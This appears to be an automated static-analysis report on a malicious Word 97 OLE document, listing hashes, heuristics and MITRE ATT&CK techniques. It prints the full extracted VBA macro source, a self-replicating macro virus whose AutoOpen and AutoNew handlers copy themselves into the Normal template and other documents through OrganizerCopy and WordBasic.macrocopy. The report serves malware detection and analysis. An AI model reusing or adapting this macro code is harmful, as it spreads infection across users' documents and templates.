Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e71eec0c90d4d76e…

MALICIOUS

Office (OLE)

32.0 KB Created: 1999-06-08 21:30:00 Authoring application: Microsoft Word 8.0 First seen: 2015-09-30
MD5: ac393e6bd7551393f1a6330601149460 SHA-1: c3a4bd432773f970faaa35038202ba560f049823 SHA-256: e71eec0c90d4d76ee45803dac87e6437018ff7838cb283d4074a69166335bd0e
108 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample is a malicious Office document containing VBA macros. The critical heuristic indicates self-replication and AV tampering, and the VBA script explicitly uses WordBasic.macrocopy and Application.OrganizerCopy to copy macros to the Normal template, active document, and attached template. This behavior suggests an attempt to establish persistence and spread the malicious macros.

Heuristics 4

  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
       Application.OrganizerCopy Source:=mac$, _
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
        ar$(2) = "AutoOpen"
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1402 bytes
SHA-256: dd7b760c3882c231fcd534b9098cf44a612250b737efc55200232ddf6ca223d3
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "AutoNew"
Dim nor$
Dim doc$
Dim tem$
Dim mac$
Dim em
Dim ar$(2)



Sub main()
    ar$(1) = "AutoNew"
    ar$(2) = "AutoOpen"
    
    On Error Resume Next
  
    mac$ = MacroContainer.Name
    
    nor$ = NormalTemplate.Path
    nor$ = nor$ & "\" & NormalTemplate.Name
    
    doc$ = ActiveDocument.Name
    
    With ActiveDocument.AttachedTemplate
        tem$ = .Path
        tem$ = tem$ & "\" & .Name
    End With
file$ = WordBasic.[filename$]()
fil$ = file$ + ":AutoOpen"
WordBasic.macrocopy fil$, "AutoOpen"
fil1$ = file$ + ":AutoNew"
WordBasic.macrocopy fil1$, "AutoNew"
   For n% = 1 To 2
   
   Application.OrganizerCopy Source:=mac$, _
        Destination:=nor$, Name:=ar$(n%), _
        Object:=wdOrganizerObjectProjectItems
        
   Application.OrganizerCopy Source:=mac$, _
        Destination:=ActiveDocument, Name:=ar$(n%), _
        Object:=wdOrganizerObjectProjectItems
        
   Application.OrganizerCopy Source:=mac$, _
        Destination:=tem$, Name:=ar$(n%), _
        Object:=wdOrganizerObjectProjectItems

    Next n%
    NormalTemplate.Save

End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.